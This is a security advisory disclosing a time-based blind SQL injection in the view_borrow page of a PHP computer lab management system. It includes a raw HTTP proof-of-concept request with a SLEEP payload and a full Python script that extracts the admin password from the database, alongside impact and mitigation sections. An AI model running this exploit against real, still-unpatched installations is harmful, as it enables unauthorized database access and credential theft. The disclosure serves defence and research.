CVE, SQLI, WEB, PHP

CVE-2024-3251 - Time-Based Blind SQL Injection in CLMS v1.0

Vulnerability Proof of Concept Report

Summary

  • CVE ID: CVE-2024-3251
  • Vendor: Sourcecodester
  • Product: Computer Laboratory Management System
  • Product Link: Product
  • Affected Versions: v1.0
  • Fixed in Version: Not Fixed
  • Vulnerability Type: Time-Based Blind SQL Injection
  • Severity: Critical
  • Researchers: Simon Bertrand (Almightysec)
  • Disclosure Date: 04/01/2024

Vulnerability Description

An SQL Injection vulnerability has been identified in the /view_borrow function via the id parameter of Sourcecodester Computer Laboratory Management System affecting version 1.0 The vulnerability arises due to insufficient input validation and sanitation of user-supplied data in the /view_borrow function. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application’s backend database, leading to unauthorized access, data exfiltration, or database corruption.

Affected Components

The SQL injection vulnerability affects the view_borrow function, specifically through the id parameter in the URL path. This component is part of the administrative backend of the Computer Laboratory Management System, intended for managing borrowing records.

  • URL Path: /admin/?page=borrow/view_borrow&id=
  • Parameter: id
  • Function: view_borrow
  • Location: Administrative backend, under the Borrows management section.

This vulnerability is present in the application’s handling of dynamic SQL queries without proper validation or sanitation of user-supplied input. As a result, an attacker can manipulate the id parameter to inject arbitrary SQL commands, potentially leading to unauthorized access, data exfiltration, or manipulation of the database.

The issue arises within the web application’s server-side processing of the URL parameter. It does not properly sanitize input before incorporating it into SQL queries that are executed against the backend database. This oversight makes it possible to execute unintended SQL commands, affecting the database’s integrity and confidentiality.

Steps to Reproduce

Follow these steps to reproduce the vulnerability. Please use this section responsibly, ensuring that only authorized individuals can perform these actions in a safe and legal environment.

  1. Environment Setup:
  2. Initial Conditions:
    • From the Administration panel, create a low priv user.
    • Log out from the Administrator account
    • Login as low priv user.
  3. Reproduction Steps:
    • Step 1: Click on Borrows tab
    • Step 2: Click on View
    • Step 3: Capture request and send to Repeater.
    • Step 4: Test with sleep payload '+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))exploit)--+

POC: 

GET /php-lms/admin/?page=borrow/view_borrow&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))exploit)--+ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/php-lms/admin/?page=borrow
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Connection: close

Exploit Code: 

import requests
import sys
import time

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

def banner():
    print(f"{Colors.HEADER}SQL injection in LMS-PHP v1.0{Colors.ENDC}")
    print(f"{Colors.OKBLUE}---------------------------------{Colors.ENDC}\n")

def print_help():
    print("Usage: python exploit.py <URL>")
    print("Example: python exploit.py http://example.com")
    sys.exit(1)

def check_condition(url, session, condition):
    injected_url = f"{url}'+AND+IF({condition},SLEEP(5),0)--+"
    start_time = time.time()
    session.get(injected_url)
    response_time = time.time() - start_time
    return response_time >= 5

def extract_char_at_pos(url, session, pos):
    low = 32
    high = 126
    while low <= high:
        mid = (low + high) // 2
        condition = f"ascii(substring((SELECT password FROM lms_db.users WHERE id=1 LIMIT 1),{pos},1))>{mid}"
        if check_condition(url, session, condition):
            low = mid + 1
        else:
            high = mid - 1
    return chr(low)

def extract_data(url):
    session = requests.Session()
    extracted = ""
    for pos in range(1, 33):
        extracted += extract_char_at_pos(url, session, pos)
        print(f"{Colors.OKGREEN}Extracted so far: {extracted}{Colors.ENDC}")
    print(f"{Colors.OKGREEN}Full extracted data: {extracted}{Colors.ENDC}")

def main():
    banner()
    if len(sys.argv) != 2 or sys.argv[1] in ['-h', '--help']:
        print_help()

    url = sys.argv[1] + "/php-lms/admin/?page=borrow/view_borrow&id=1"
    extract_data(url)

if __name__ == "__main__":
    main()

Impact Analysis

The identified SQL Injection vulnerability within the Computer Laboratory Management System poses significant risks that could lead to severe impacts on confidentiality, integrity, and availability of the system and its data. Specifically:

  • Data Exposure: Confidential data, including student records, administrative information, and potentially sensitive personal data, could be extracted by unauthorized parties. This exposure risks privacy breaches and regulatory non-compliance.
  • Unauthorized Access: Attackers might gain unauthorized access to other parts of the system or escalate their privileges, allowing them to alter system configurations, manipulate data, or disrupt operational integrity.
  • Service Disruption: By exploiting this vulnerability, attackers could render the system unstable or entirely unavailable, affecting the day-to-day operations of the computer laboratory management.
  • Reputational Damage: Incidents arising from this vulnerability could erode trust among stakeholders, including students, faculty, and administration, potentially leading to a decline in system usage and confidence in the institution’s cybersecurity posture.

Mitigation and Recommendations

To mitigate the identified vulnerability and reduce potential impacts, the following steps are recommended:

  • Immediate Patching: If the vendor releases a patch, apply it immediately. Given the absence of a fix, consider the following temporary measures.
  • Input Validation: Implement rigorous input validation checks to ensure only expected data types and formats are processed. Use allowlists for allowable characters in inputs.
  • Prepared Statements: Transition to using prepared statements with parameterized queries in all database interactions to effectively neutralize SQL Injection attacks.
  • Error Handling: Customize error messages to avoid revealing details about the database structure or pointing to existing vulnerabilities.
  • Regular Auditing: Conduct regular security audits and vulnerability assessments of the system to identify and mitigate potential vulnerabilities proactively.
  • Security Awareness: Enhance security awareness among developers and administrators regarding common vulnerabilities and secure coding practices.

Vendor Communication

Detail the timeline of communication with the vendor, including when the vulnerability was reported, any responses received, and the current status of the vulnerability.

  • Reported On: 04/01/2024 - The vulnerability was reported
  • Acknowledged On: N/A - As of the last update, the vendor has not acknowledged the report.
  • Fixed On: N/A - A fix for the vulnerability has not been issued.
  • CVE Assigned On: 04/03/2024 - CVE assigned: CVE-2024-3251

Efforts to follow up with the vendor will continue, and updates will be provided as new information becomes available.

References

External references and advisories directly related to this specific vulnerability in the Computer Laboratory Management System. The following are general resources on SQL Injection prevention techniques, best practices and links to the CVE:

  1. CVE Mitre: Link
  2. NIST: Link
  3. CVE Details: link
  4. Vuldb: Link
  5. OWASP SQL Injection Prevention Cheat Sheet: Link
  6. OWASP Guide to SQL Injection: Link

This section will be updated as the vendor provides feedback or releases patches.

Acknowledgments

Special thanks to the cybersecurity and open-source communities for their invaluable tools and resources that support vulnerability research. Appreciation is extended to colleagues and peers for their insights and feedback during the vulnerability analysis process.

This report is provided “as is” for informational purposes only. The authors do not take any responsibility for misuse of this information. Researchers and testers should conduct their activities with respect to applicable laws and guidelines for ethical hacking.